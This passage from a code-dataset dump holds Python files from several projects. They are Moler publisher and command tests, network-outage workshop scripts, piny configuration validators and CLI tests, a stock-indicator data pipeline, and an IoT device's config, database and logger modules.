def test_exception_in_subscriber_doesnt_break_publisher_nor_other_subscribers():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def failing_observer(data):
raise Exception("Fail inside observer")
def one_time_observer(data):
received_data.append(data)
notifier.unsubscribe(subscriber=one_time_observer)
notifier.subscribe(subscriber=failing_observer)
notifier.subscribe(subscriber=one_time_observer)
notifier.notify_subscribers(data=b"data 1")
notifier.unsubscribe(subscriber=failing_observer)
assert b"data 1" in received_data
def test_subscriber_may_have_different_function_signature():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def no_param_fun():
received_data.append("no_param_fun")
notifier.subscribe(subscriber=no_param_fun)
notifier.notify_subscribers()
assert received_data[-1] == "no_param_fun"
notifier.unsubscribe(subscriber=no_param_fun)
def single_param_fun(data):
received_data.append(("single_param_fun", data))
notifier.subscribe(subscriber=single_param_fun)
notifier.notify_subscribers(data=b"data 1")
assert received_data[-1] == ("single_param_fun", b"data 1")
notifier.unsubscribe(subscriber=single_param_fun)
def multi_param_fun(data, info, default=None):
received_data.append(("multi_param_fun", data, info, default))
notifier.subscribe(subscriber=multi_param_fun)
notifier.notify_subscribers(data="data1", info="INFO", default="DEF")
assert received_data[-1] == ("multi_param_fun", "data1", "INFO", "DEF")
notifier.notify_subscribers(data="data2", info="INFO")
assert received_data[-1] == ("multi_param_fun", "data2", "INFO", None)
notifier.unsubscribe(subscriber=multi_param_fun)
def variable_param_fun(*args, **kwargs):
received_data.append(("variable_param_fun", args, kwargs))
notifier.subscribe(subscriber=variable_param_fun)
notifier.notify_subscribers("data1", "INFO", "DEF")
assert received_data[-1] == ("variable_param_fun", ("data1", "INFO", "DEF"), {})
notifier.notify_subscribers(data="data2", info="INFO", default="DEF")
assert received_data[-1] == ("variable_param_fun", (), {"data": "data2", "info": "INFO", "default": "DEF"})
notifier.notify_subscribers("data3", info="INFO", default="DEF")
assert received_data[-1] == ("variable_param_fun", ("data3",), {"info": "INFO", "default": "DEF"})
notifier.unsubscribe(subscriber=variable_param_fun)
def test_subscriber_must_have_function_signature_matching_the_one_expected_by_publisher():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def compatible_fun(data, info, default=None):
received_data.append(("compatible_fun", data, info, default))
def incompatible_fun(data):
received_data.append(("incompatible_fun", data))
notifier.subscribe(subscriber=compatible_fun)
notifier.subscribe(subscriber=incompatible_fun)
def handle_exception(self, subscriber_owner, subscriber_function, raised_exception):
assert subscriber_owner is None
assert subscriber_function.__name__ == "incompatible_fun"
assert isinstance(raised_exception, TypeError)
assert "unexpected keyword argument 'info'" in str(raised_exception)
with mock.patch.object(notifier.__class__, "handle_subscriber_exception", handle_exception):
notifier.notify_subscribers(data="data1", info="INFO", default="DEF")
assert received_data == [("compatible_fun", "data1", "INFO", "DEF")] # only 1 entry
notifier.unsubscribe(subscriber=compatible_fun)
notifier.unsubscribe(subscriber=incompatible_fun)
def test_repeated_unsubscription_does_nothing_but_logs_warning():
"""
Because of possible different concurrency models (and their races)
we don't want to raise an exception when there is already
"no such subscription" - we just put a warning into the logs
"""
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def one_time_observer(data):
received_data.append(data)
notifier.unsubscribe(subscriber=one_time_observer)
notifier.subscribe(subscriber=one_time_observer)
notifier.notify_subscribers(data=b"data 1")
notifier.unsubscribe(subscriber=one_time_observer)
# TODO: check warning in logs (when we set logging system)
notifier.notify_subscribers(data=b"data 2")
assert b"data 1" in received_data
assert b"data 2" not in received_data # because of unsubscription during notification
def test_single_unsubscription_doesnt_impact_other_subscribers():
from moler.publisher import Publisher
observer1 = Subscriber()
observer2 = Subscriber()
function_received_data = []
def raw_fun1(data):
function_received_data.append(data)
def raw_fun2(data):
function_received_data.append(data)
class TheCallableClass(object):
def __init__(self):
self.received_data = []
def __call__(self, data):
self.received_data.append(data)
callable1 = TheCallableClass()
callable2 = TheCallableClass()
notifier = Publisher()
notifier.subscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.unsubscribe(subscriber=observer1.on_new_data)
notifier.unsubscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=raw_fun1)
notifier.subscribe(subscriber=raw_fun2)
notifier.subscribe(subscriber=raw_fun2)
notifier.unsubscribe(subscriber=raw_fun1)
notifier.subscribe(subscriber=callable1)
notifier.subscribe(subscriber=callable2)
notifier.subscribe(subscriber=callable2)
notifier.unsubscribe(subscriber=callable1)
notifier.notify_subscribers("incoming data")
assert observer1.received_data == []
assert observer2.received_data == ["incoming data"]
assert function_received_data == ["incoming data"]
assert callable1.received_data == []
assert callable2.received_data == ["incoming data"]
def test_subscription_doesnt_block_subscriber_to_be_garbage_collected():
from moler.publisher import Publisher
notifier = Publisher()
garbage_collected_subscribers = []
class GcSubscriber(object):
def __del__(self):
garbage_collected_subscribers.append('Subscriber')
subscr = GcSubscriber()
notifier.subscribe(subscr)
del subscr
gc.collect()
assert 'Subscriber' in garbage_collected_subscribers
def test_garbage_collected_subscriber_is_not_notified():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
class GcSubscriber(object):
def __call__(self, data):
received_data.append(data)
subscr1 = GcSubscriber()
subscr2 = GcSubscriber()
notifier.subscribe(subscriber=subscr1)
notifier.subscribe(subscriber=subscr2)
del subscr1
gc.collect()
notifier.notify_subscribers("data")
assert len(received_data) == 1
```
#### File: test/unix/test_cmd_cut.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.cut import Cut
from moler.exceptions import CommandFailure
import pytest
def test_cut_raise_exception(buffer_connection, command_output_and_expected_result):
command_output, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response([command_output])
cut_cmd = Cut(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure):
cut_cmd()
@pytest.fixture
def command_output_and_expected_result():
data = """host:~ # cut
cut: you must specify a list of bytes, characters, or fields
Try 'cut --help' for more information.
host:~ #"""
result = {
'LINES': []
}
return data, result
```
#### File: workshop1/step12/network_outage.py
```python
import os.path
import time
from moler.config import load_config
from moler.device.device import DeviceFactory
from moler.util.moler_test import MolerTest
def outage_callback(device_name, ping_times):
MolerTest.info("Network outage on {}".format(device_name))
ping_times["lost_connection_time"] = time.time()
def ping_is_on_callback(ping_times):
MolerTest.info("Ping works")
if ping_times["lost_connection_time"] > 0: # ping operable AFTER any net loss
if ping_times["reconnection_time"] == 0:
ping_times["reconnection_time"] = time.time()
outage_time = ping_times["reconnection_time"] - ping_times["lost_connection_time"]
MolerTest.info("Network outage time is {}".format(outage_time))
def test_network_outage():
load_config(config=os.path.abspath('config/my_devices.yml'))
unix1 = DeviceFactory.get_device(name='MyMachine1')
unix2 = DeviceFactory.get_device(name='MyMachine2')
# test setup
ping_times = {"lost_connection_time": 0,
"reconnection_time": 0}
# ensure network is up before running test
net_up = unix2.get_cmd(cmd_name="ifconfig", cmd_params={"options": "lo up"})
sudo_ensure_net_up = unix2.get_cmd(cmd_name="sudo", cmd_params={"password": "<PASSWORD>", "cmd_object": net_up})
sudo_ensure_net_up()
# run event observing "network down/up"
no_ping = unix1.get_event(event_name="ping_no_response")
no_ping.add_event_occurred_callback(callback=outage_callback,
callback_params={'device_name': 'MyMachine1',
'ping_times': ping_times})
no_ping.start()
ping_is_on = unix1.get_event(event_name="ping_response")
ping_is_on.add_event_occurred_callback(callback=ping_is_on_callback,
callback_params={'ping_times': ping_times})
ping_is_on.start()
# run test
ping = unix1.get_cmd(cmd_name="ping", cmd_params={"destination": "localhost", "options": "-O"})
ping.start(timeout=120)
time.sleep(3)
ifconfig_down = unix2.get_cmd(cmd_name="ifconfig", cmd_params={"options": "lo down"})
sudo_ifconfig_down = unix2.get_cmd(cmd_name="sudo", cmd_params={"password": "<PASSWORD>", "cmd_object": ifconfig_down})
sudo_ifconfig_down()
time.sleep(5)
ifconfig_up = unix2.get_cmd(cmd_name="ifconfig", cmd_params={"options": "lo up"})
sudo_ifconfig_up = unix2.get_cmd(cmd_name="sudo", cmd_params={"password": "<PASSWORD>", "cmd_object": ifconfig_up})
sudo_ifconfig_up()
time.sleep(3)
# test teardown
ping.cancel()
no_ping.cancel()
if __name__ == '__main__':
test_network_outage()
"""
copy this file into workshop1/network_outage.py
*** calculating network outage time ***
1. run it
2. see logs - look for "Network outage" and "Ping works"
- be careful when analysing the logs - what's wrong?
3. fix incorrect calculation by exchanging:
no_ping = unix1.get_event(event_name="ping_no_response")
into:
no_ping = unix1.get_event(event_name="ping_no_response", event_params={"till_occurs_times": 1})
"""
```
#### File: workshop1/step1/network_outage.py
```python
import os.path
from moler.config import load_config
from moler.device.device import DeviceFactory
def test_network_outage():
load_config(config=os.path.abspath('my_devices.yml'))
unix1 = DeviceFactory.get_device(name='MyMachine1')
unix2 = DeviceFactory.get_device(name='MyMachine2')
if __name__ == '__main__':
test_network_outage()
"""
copy this file into workshop1/network_outage.py
1. run it
2. check logs
3. add PATH to LOGGER configuration & check logs
- if not given, logs are created in the current working directory
4. add RAW_LOG: True & check logs
5. add DEBUG_LEVEL: DEBUG & check logs
6. add DATE_FORMAT: "%Y-%m-%d %H:%M:%S" & check logs
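example LOGGER section once steps 3-6 are applied (a sketch - the keys are the ones
named above, the path and values are placeholders to adapt to your machine):
LOGGER:
  PATH: /tmp/moler_logs
  RAW_LOG: True
  DEBUG_LEVEL: DEBUG
  DATE_FORMAT: "%Y-%m-%d %H:%M:%S"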
"""
``` |
{
"source": "jochenparm/piny",
"score": 3
} |
#### File: piny/piny/validators.py
```python
from abc import ABC, abstractmethod
from typing import Any, Dict, List, Union
from .errors import ValidationError
LoadedData = Union[Dict[str, Any], List[Any]]
class Validator(ABC):
"""
Abstract base class for optional validator classes
Use only to derive new child classes, implement all abstract methods
"""
def __init__(self, schema: Any, **params):
self.schema = schema
self.schema_params = params
@abstractmethod
def load(self, data: LoadedData, **params):
"""
        Load data, return validated data or raise an error
"""
pass # pragma: no cover
class PydanticValidator(Validator):
"""
Validator class for Pydantic library
"""
def load(self, data: LoadedData, **params):
try:
return self.schema(**{**data, **params}).dict()
except Exception as e:
raise ValidationError(origin=e, reason=str(e))
class MarshmallowValidator(Validator):
"""
Validator class for Marshmallow library
"""
def load(self, data: LoadedData, **params):
try:
return self.schema(**self.schema_params).load(data, **params).data
except Exception as e:
raise ValidationError(origin=e, reason=str(e))
class TrafaretValidator(Validator):
"""
Validator class for Trafaret library
"""
def load(self, data: LoadedData, **params):
try:
return self.schema.check(data)
except Exception as e:
raise ValidationError(origin=e, reason=str(e))
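# Usage sketch for the validators above (hypothetical schema and data, not part of this module):
#
#     from pydantic import BaseModel
#
#     class DBConfig(BaseModel):
#         host: str
#         password: str
#
#     validator = PydanticValidator(schema=DBConfig)
#     validated = validator.load({"host": "localhost", "password": "secret"})  # returns a dict, or raises ValidationError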
```
#### File: piny/tests/test_cli.py
```python
from unittest import mock
import pytest
import yaml
from click.testing import CliRunner
from piny import LoadingError
from piny.cli import cli
from . import config_directory
def test_cli_input_stdin_output_stdout():
runner = CliRunner()
with mock.patch("piny.matchers.StrictMatcher.constructor") as expand_mock:
expand_mock.return_value = "<PASSWORD>"
result = runner.invoke(cli, input="password: ${DB_PASSWORD}")
assert result.exit_code == 0
assert result.stdout == "password: <PASSWORD>"
def test_cli_input_file_output_file():
runner = CliRunner()
with open(config_directory.joinpath("db.yaml"), "r") as f:
input_lines = f.readlines()
with runner.isolated_filesystem():
with open("input.yaml", "w") as input_fd:
input_fd.writelines(input_lines)
with mock.patch("piny.matchers.StrictMatcher.constructor") as expand_mock:
expand_mock.return_value = "<PASSWORD>"
result = runner.invoke(cli, ["input.yaml", "output.yaml"])
with open("output.yaml", "r") as output_fd:
output_lines = output_fd.readlines()
assert result.exit_code == 0
assert "password: <PASSWORD>" in map(
lambda x: x.strip(), output_lines
)
def test_cli_fail():
runner = CliRunner()
with mock.patch("piny.loaders.yaml.load") as loader_mock:
loader_mock.side_effect = yaml.YAMLError("Oops!")
result = runner.invoke(cli, input="password: ${DB_PASSWORD}")
assert result.exit_code == 1
assert type(result.exception) == LoadingError
``` |
{
"source": "jochenruland/stock_price_indicator",
"score": 4
} |
#### File: app/data_wrangling/process_data.py
```python
import sys
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import datetime as dt
from alpha_vantage.timeseries import TimeSeries
import os.path
# Download data from Alpha-Vantage
A_key = '<KEY>'
def download_stock_data(symbol, API_key= A_key):
try:
ts = TimeSeries(key = API_key, output_format = 'pandas')
data = ts.get_daily_adjusted(symbol, outputsize='full')
symbol = symbol.upper()
df = data[0]['5. adjusted close'].reset_index().rename(columns={"5. adjusted close": symbol}).sort_values('date', ascending =True)
df.to_csv(symbol+'.csv', index = False)
return df
except Exception as e:
        print('Exception occurred: {}'.format(e))
# Import data from csv file
def get_data(symbol='AAPL', start_date='2020-01-01', end_date='2020-12-31'):
'''
    Sets up an empty dataframe with the given time period as index, then loads data from
    a .csv file for the selected symbol and keeps the Adj Close column.
    INPUT:
    symbol - string - ticker symbol of the listed stock
start_date - datetime - Beginning of the period to analyze
end_date - datetime - End of the period to analyze
OUTPUT
df - dataframe - Dataframe containing the Adj Close for the symbol with the time period as index (ordered ascending)
'''
try:
dates= pd.date_range(start_date, end_date)
df = pd.DataFrame(index=dates)
if os.path.isfile(symbol+'.csv') == False:
print("No such file exists; will be downloaded")
download_stock_data(symbol)
df_tmp = pd.read_csv(symbol+'.csv', index_col = 'date')
df = df.join(df_tmp)
df = df.dropna()
return df
except Exception as e:
        print('Exception occurred: {}'.format(e))
# Noramlize the stock price data
def normalize_stock_data(df):
df = df/df.iloc[0,:]
return df
class StockDataAnalysis():
    ''' Creates a StockDataAnalysis object which is able to take one or multiple stock symbols and a timeframe and then computes
    a range of indicators on the stock data and plots the results'''
def __init__(self, symbol='AAPL', start_date='2020-01-01', end_date='2021-04-16'):
''' Create an instance of StockDataAnalysis'''
self.symbol = symbol
if isinstance(start_date, str):
self.start_date = dt.datetime.strptime(start_date, '%Y-%m-%d')
self.end_date = dt.datetime.strptime(end_date, '%Y-%m-%d')
else:
self.start_date = start_date
self.end_date = end_date
self.data = get_data(self.symbol, self.start_date, self.end_date)
if self.data.shape[0] != 0:
self.data_norm = normalize_stock_data(self.data)
# Plot stock price data and check for anomalies
def plot_stock_data(self, normalized=True):
if normalized:
df = self.data_norm
title_str = 'Relative stock price development'
else:
df = self.data
title_str = 'Absolute stock price development'
if isinstance(df, pd.Series):
plt.figure(figsize=(12,8))
ax1 = df.plot()
ax1.set_xlabel('time')
ax1.set_ylabel('price')
ax1.set_title(title_str)
plt.legend(loc='upper right')
plt.show()
else:
plt.figure(figsize=(12,18))
ax2 = plt.subplot(2,1,1)
ax2.set_xlabel('time')
ax2.set_ylabel('price development')
ax2.set_title(title_str)
for col in df.columns:
df[col].plot()
plt.legend(loc='upper right')
plt.show()
def calculate_rolling_stats(self, win=10):
rm = self.data_norm.rolling(window=win).mean()
rstd = self.data_norm.rolling(window=win).std()
self.sma = rm.dropna()
self.rstd = rstd.dropna()
def calculate_bollinger_bands(self):
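        # Bollinger bands: simple moving average plus/minus two rolling standard deviations.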
self.b_upper_band = self.sma + self.rstd*2
self.b_lower_band = self.sma - self.rstd*2
def calculate_daily_returns(self):
daily_returns = self.data.copy()
daily_returns[1:] = (self.data[1:]/self.data[:-1].values) - 1
daily_returns.iloc[0,:] = 0
self.daily_returns = daily_returns
def calculate_cumulative_returns(self):
        cumulative_returns = self.data.copy()
        cumulative_returns = (self.data/self.data.iloc[0]) - 1
self.cumulative_returns = cumulative_returns
def calculate_momentum(self, win=5):
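        # Momentum over `win` days: today's price divided by the price `win` days earlier, minus 1.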
self.momentum = self.data.copy()
self.momentum[win:] = (self.data[win:]/self.data[:-(win)].values) - 1
self.momentum.iloc[0:(win),:] = 0
def get_market_index(self, market_ix='SPY'):
self.market_ix = market_ix
self.market_index = get_data(symbol=market_ix, start_date=self.start_date, end_date=self.end_date)
def setup_features(self, market_ix='SPY'):
self.calculate_rolling_stats()
self.calculate_bollinger_bands()
self.calculate_daily_returns()
self.calculate_cumulative_returns()
self.calculate_momentum()
self.get_market_index(market_ix=market_ix)
def create_indicator_dataframe(self):
        ''' Function which takes the Adj Close and corresponding dates per symbol, adds a new column containing the symbol
and joins all indicators to one dataframe
INPUT:
object
OUTPUT:
indicator_df - dataframe - contains the Adj Close and all indicators as features tagged by the symbol '''
self.indicator_df = pd.DataFrame(columns=['Date','Symbol', 'Adj Close','Daily Returns','Cumulative Returns','SMA', 'Momentum', 'Upper Band','Lower Band','Market Index'])
for symbol in self.data.columns:
df_temp = self.data[symbol].reset_index().rename(columns={'index':'Date', symbol:'Adj Close'})
df_temp['Symbol'] = symbol
df_temp = df_temp.join(self.daily_returns[symbol], on='Date').rename(columns={symbol:'Daily Returns'})
df_temp = df_temp.join(self.cumulative_returns[symbol], on='Date').rename(columns={symbol:'Cumulative Returns'})
df_temp = df_temp.join(self.sma[symbol], on='Date').rename(columns={symbol:'SMA'})
df_temp = df_temp.join(self.momentum[symbol], on='Date').rename(columns={symbol:'Momentum'})
df_temp = df_temp.join(self.b_upper_band[symbol], on='Date').rename(columns={symbol:'Upper Band'})
df_temp = df_temp.join(self.b_lower_band[symbol], on='Date').rename(columns={symbol:'Lower Band'})
df_temp = df_temp.join(self.market_index[self.market_ix], on='Date').rename(columns={self.market_ix:'Market Index'})
self.indicator_df = pd.concat([self.indicator_df, df_temp])
self.indicator_df.fillna(method='ffill', inplace=True)
self.indicator_df.fillna(method='bfill', inplace=True)
self.indicator_df.dropna()
return self.indicator_df
def main(symbol='AAPL', start_date='2020-01-01', end_date='2020-12-31'):
''' This Function creates an instance of the StockDataAnalysis class and plots the result '''
try:
st_data = StockDataAnalysis(symbol=symbol, start_date=start_date, end_date=end_date)
st_data.setup_features()
df_indicators = st_data.create_indicator_dataframe()
print(df_indicators.head(50))
st_data.plot_stock_data(normalized=False)
except Exception as e:
        print('Exception occurred: {}'.format(e))
if __name__ == '__main__':
main()
```
#### File: stock_price_indicator/app/ETL.py
```python
import sys
import pandas as pd
import datetime as dt
import numpy as np
import matplotlib.pyplot as plt
import sqlite3
from data_wrangling.process_data import StockDataAnalysis
from data_wrangling.train_classifier import ModelStockPrice
def main():
try:
print('Enter start date in date format (YYYY-MM-DD):')
start_date = input()
sd = dt.datetime.strptime(start_date, '%Y-%m-%d')
print('Enter end date in date format (YYYY-MM-DD):')
end_date = input()
ed = dt.datetime.strptime(end_date, '%Y-%m-%d')
if start_date >= end_date:
return print('Start date must be before end date')
elif (ed - sd).days < 30:
return print('Timeframe between start date and end date must be minimum 30 days')
elif ed > dt.datetime.now():
return print('End date must be equal or before actual date')
else:
            print('Enter a comma separated list of ticker symbols (f.ex. AAPL,GOOG,BABA):')
symbols_str = input()
symbol_lst = symbols_str.replace(" ", "").split(",")
if not symbol_lst:
return print("No ticker symbol was entered")
else:
for s in symbol_lst:
s=s.upper()
st_data = StockDataAnalysis(symbol=s,start_date=sd, end_date=ed)
if st_data.data.shape[0] == 0:
print('No data could be found for ticker symbol {}'.format(s))
else:
st_data.setup_features()
df_indicators = st_data.create_indicator_dataframe()
conn = sqlite3.connect('indicators.db')
df_indicators.to_sql(s, con = conn, if_exists='replace', index=False)
print('Stock data for {} has been saved to indicators.db'.format(s))
except Exception as e:
        print('Exception occurred: {}'.format(e))
if __name__ == '__main__':
main()
``` |
{
"source": "Jochen-TPO/internet-of-washingmachines",
"score": 2
} |
#### File: Jochen-TPO/internet-of-washingmachines/config.py
```python
import os
import json
import base_config
from typing import List, Dict
class Config:
def __init__(self):
self.root_dir: str = os.path.dirname(os.path.abspath(__file__))
self.logEnabled: bool = False
self.updateBranch: str = ''
self.sqlitePath: str = ''
self.modelPath: str = ''
self.zones: List[Dict] = []
self.deviceId: str = ''
self.projectId: str = '<KEY>'
self.screenUpdateInterval: float = 0.3
self.eventSyncInterval: float = 0.5
self.stateSyncInterval: float = 600
self.mqtt_endpoint: str = base_config.ENDPOINT
self.mqtt_crt_path: str = base_config.CRT_PATH
self.mqtt_key_path: str = base_config.KEY_PATH
self.mqtt_root_pem_path: str = base_config.ROOT_PEM
self.config_file_path: str = base_config.CONFIG_FILE
self.logging_file_path: str = base_config.LOGGING_FILE
self.dry_config_file_path: str = base_config.DRY_CONFIG_FILE
self.upload_folder_path: str = base_config.UPLOAD_FOLDER_PATH
self.registration_url: str = base_config.REGISTRATION_URL
self.logging_levels: List = base_config.LOGGING_LEVELS
self.logging_error: int = base_config.LOGGING_ERROR
self.logging_info: int = base_config.LOGGING_INFO
self.logging_debug: int = base_config.LOGGIN_DEBUG
self.MQTTLoggingLevel: int = 1
self.screenLoggingLevel: int = 3
self.screenLoggingRejectionList: List[str] = []
self.MQTTLoggingRejectionList: List[str] = ["MQTT"]
self.MQTTLogRateLimiter: int = 5
self.screenLogRateLimiter: int = 20
self.topicPrefix: str = "/"
self.platformApiUrl: str = "https://platform-test.edgise.com/api/"
self.uploaderInterval: float = 2
self.main_filename: str = "main.py"
self.main_file_path: str = f"{self.root_dir}/{self.main_filename}"
self.cronosLoginUrl: str = ''
self.cronosIncreaseUrl: str = ''
self.cronosDecreaseUrl: str = ''
self.cronosGetStatsUrl: str = ''
self.cronosGetLocationUrl: str = ''
self.cronosUsername: str = ''
self.cronosPassword: str = ''
# fetch full dry config
self.load_config_from_file(self.dry_config_file_absolute_path)
# load from dedicated device config what is possible
self.load_config_from_file(self.config_file_absolute_path)
@property
def upload_folder_absolute_path(self) -> str:
return f"{self.root_dir}/{self.upload_folder_path}"
@property
def project_id(self) -> str:
return self.projectId
@property
def device_id(self) -> str:
return self.deviceId
@property
def uploader_interval(self) -> float:
return self.uploaderInterval
@property
def mqtt_log_rate_limiter(self) -> int:
return self.MQTTLogRateLimiter
@property
def screen_log_rate_limiter(self) -> int:
return self.screenLogRateLimiter
@property
def mqtt_logging_level(self) -> int:
return self.MQTTLoggingLevel
@property
def screen_logging_level(self) -> int:
return self.screenLoggingLevel
@property
def mqtt_logging_rejection_list(self) -> List[str]:
return self.MQTTLoggingRejectionList
@property
def screen_logging_rejection_list(self) -> List[str]:
return self.screenLoggingRejectionList
@property
def platform_api_url(self):
return self.platformApiUrl
@property
def file_upload_url(self) -> str:
ret = None
if self.has_project_id and self.has_device_id:
ret = f"{self.platform_api_url}projects/{cfg.projectId}/devices/{cfg.deviceId}/files"
return ret
@property
def has_device_id(self) -> bool:
return True if self.deviceId != '' else False
@property
def update_branch(self) -> str:
return self.updateBranch
@property
def has_project_id(self) -> bool:
return True if self.projectId != '' else False
@property
def ai_model_absolute_path(self) -> str:
return f"{self.root_dir}/{self.modelPath}"
@property
def mqtt_crt_absolute_path(self) -> str:
return f"{self.root_dir}/{self.mqtt_crt_path}"
@property
def mqtt_key_absolute_path(self) -> str:
return f"{self.root_dir}/{self.mqtt_key_path}"
@property
def mqtt_root_pem_absolute_path(self) -> str:
return f"{self.root_dir}/{self.mqtt_root_pem_path}"
@property
def config_file_absolute_path(self) -> str:
return f"{self.root_dir}/{self.config_file_path}"
@property
def logging_file_absolute_path(self) -> str:
return f"{self.root_dir}/{self.logging_file_path}"
@property
def dry_config_file_absolute_path(self) -> str:
return f"{self.root_dir}/{self.dry_config_file_path}"
@property
def screen_update_interval(self) -> float:
return self.screenUpdateInterval
@property
def event_sync_interval(self) -> float:
return self.eventSyncInterval
@property
def state_sync_interval(self) -> float:
return self.stateSyncInterval
@property
def full_sqlite_path(self) -> str:
# If the path starts with 'tmp', this means we want to run the database in a tmpfs memory directory,
# and since /tmp is mounted as tmpfs, we use this
if self.sqlitePath.startswith("tmp"):
return f"sqlite:////{self.sqlitePath}"
if self.sqlitePath != '':
ret = f"sqlite:///{self.root_dir}/{self.sqlitePath}"
else:
ret = "sqlite:///:memory:"
return ret
@property
def mqtt_event_topic(self) -> str:
ret = None
if self.deviceId != '' and self.projectId != '':
ret = f"dt{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}/events"
return ret
@property
def mqtt_count_topic(self) -> str:
ret = None
if self.projectId != '':
ret = f"dt/projects/{self.projectId}/counting"
return ret
@property
def mqtt_config_topic(self) -> str:
ret = None
if self.deviceId != '':
ret = f"cfg/devices/{self.deviceId}"
return ret
@property
def mqtt_cmd_topic(self):
ret = None
if self.projectId != '':
ret = f"cmd{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}"
return ret
@property
def mqtt_state_topic(self) -> str:
ret = None
if self.deviceId != '' and self.projectId != '':
ret = f"dt{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}/state"
return ret
@property
def mqtt_log_topic(self) -> str:
ret = None
if self.deviceId != '' and self.projectId != '':
ret = f"dt{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}/logs"
return ret
def update_config_with_dict(self, config_dict: Dict):
"""
Update the config file with the JSON dict received
:param config_dict:
:return: None
"""
for key in self.__dict__.keys():
if key in config_dict.keys():
if config_dict[key] is not None and config_dict[key] != '' or \
key == 'updateBranch' or \
key == 'sqlitePath':
self.__dict__[key] = config_dict[key]
self.write_config_to_file()
def write_config_to_file(self):
"""
Save current config to file
:return: None
"""
with open(self.config_file_absolute_path, 'w+') as f:
json.dump(self.__dict__, f)
def load_config_from_file(self, file_path: str) -> bool:
"""
Load config parameters from file
:param file_path: path to config file
:return: True if file exists
"""
if os.path.exists(file_path):
with open(file_path, 'r') as f:
config_dict = json.load(f)
for key in self.__dict__.keys():
if key in config_dict.keys():
self.__dict__[key] = config_dict[key]
return True
else:
return False
cfg = Config()
```
#### File: src/database/__init__.py
```python
import sqlalchemy as db
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import func
Base = declarative_base()
from .movement import Movement
from .platform_sync import PlatformSync
from sqlalchemy.sql import exists
from typing import List
from os import path
from src.log import logger
from config import cfg
class DbManager:
def __init__(self):
self.engine = create_engine(cfg.full_sqlite_path, connect_args={'timeout': 60})
if not path.exists(f"{cfg.root_dir}/{cfg.sqlitePath}") or \
cfg.full_sqlite_path == "sqlite://" or \
cfg.full_sqlite_path == "sqlite:///:memory:":
# 2 - generate database schema
logger.info(f"[DB] DB non existent : creating @ {cfg.full_sqlite_path}")
Base.metadata.create_all(bind=self.engine)
self.session_factory = sessionmaker(bind=self.engine)
self.Session = scoped_session(self.session_factory)
def close(self):
self.Session.close()
self.engine.dispose()
def get_engine(self):
return self.engine
def get_session(self):
return self.Session()
def get_entered(self):
""" Get number of people entered that have not been synced yet """
s = self.get_session()
n_in = s.query(func.count()).filter(Movement.entered == True).scalar()
return n_in
def get_left(self):
""" Get number of people left that have not been synced yet """
s = self.get_session()
n_out = s.query(func.count()).filter(Movement.entered == False).scalar()
return n_out
def stuff_single_entry(self, entered: bool):
""" Add sample to local DB with 1 entered or left"""
s = self.get_session()
ids_sample = Movement()
ids_sample.entered = entered
s.add(ids_sample)
s.commit()
def get_unsynced(self):
"""
        Get all records that exist in the Movement table, but not in the PlatformSync table
:return: List[records]
"""
s = self.get_session()
unsynced_data = s.query(Movement).filter(
~exists().where(Movement.id == PlatformSync.idm)) \
.order_by(Movement.timestamp.asc()).all()
return unsynced_data
def update_synced(self, idms: List[int]):
"""
Add the Movement ID's to PlatformSync table
:param idms: List of ID's to add
:return: None
"""
s = self.get_session()
for id in idms:
tmp = PlatformSync()
tmp.idm = id
s.add(tmp)
s.commit()
```
#### File: src/edgise_logger/__init__.py
```python
from multiprocessing import Process, Queue, Event
from typing import Dict
from datetime import datetime
import queue
import time
from config import cfg
import json
class EdgiseLogger(Process):
"""
    An asynchronous logger with rate limiting
"""
def __init__(self,
stop_event: Event,
incoming_q: Queue,
outgoing_q: Queue = None,
outgoing_method: str = "json",
print_to_screen: bool = True,):
super(EdgiseLogger, self).__init__()
self._incoming_q: Queue = incoming_q
self._outgoing_q: Queue = outgoing_q
self._outgoing_method: str = outgoing_method
self._print_to_screen: bool = print_to_screen
self._stop_event: Event = stop_event
self._screen_rate_limit: int = cfg.screen_log_rate_limiter
self._mqtt_rate_limit: int = cfg.mqtt_log_rate_limiter
self._allowance_screen: float = self._screen_rate_limit
self._allowance_mqtt: float = self._mqtt_rate_limit
self._last_screen_msg: float = time.time()
self._last_mqtt_msg: float = time.time()
self._dropped_screen_msg_count: int = 0
self._dropped_mqtt_msg_count: int = 0
self._last_screen_rate_limiter_print: float = time.time()
self._last_mqtt_rate_limiter_print: float = time.time()
@property
def dropped_msg_count(self):
return self._dropped_screen_msg_count
@property
def incoming_q(self) -> Queue:
return self._incoming_q
@incoming_q.setter
def incoming_q(self, value: Queue):
self._incoming_q = value
@property
def outgoing_q(self) -> Queue:
return self._outgoing_q
@outgoing_q.setter
def outgoing_q(self, value: Queue):
self._outgoing_q = value
@property
def outgoing_method(self) -> str:
        return self._outgoing_method
@outgoing_method.setter
def outgoing_method(self, value: str):
self._outgoing_method = value
@property
def print_to_screen(self) -> bool:
return self._print_to_screen
@print_to_screen.setter
def print_to_screen(self, value: bool):
self._print_to_screen = value
@property
def stop_event(self) -> Event:
return self._stop_event
def get_dropped_msg_count(self) -> int:
return self.dropped_msg_count
def create_output_line(self, level: int, sender: str, msg: str) -> str:
try:
timestr: str = datetime.now().strftime("%m/%d/%Y %H:%M:%S")
out = f"{cfg.logging_levels[level]}:({timestr}) [{sender}] {msg}"
except Exception as e:
self.display(self.create_output_line(cfg.logging_error,
'LOG',
f"Error in create_output_line with (lvl, sender, message):({level}, {sender}, {msg}) : {str(e)}"))
out = ""
return out
def print_screen_rate_limiter(self):
"""
Prints the rate limiting messages
:return: None
"""
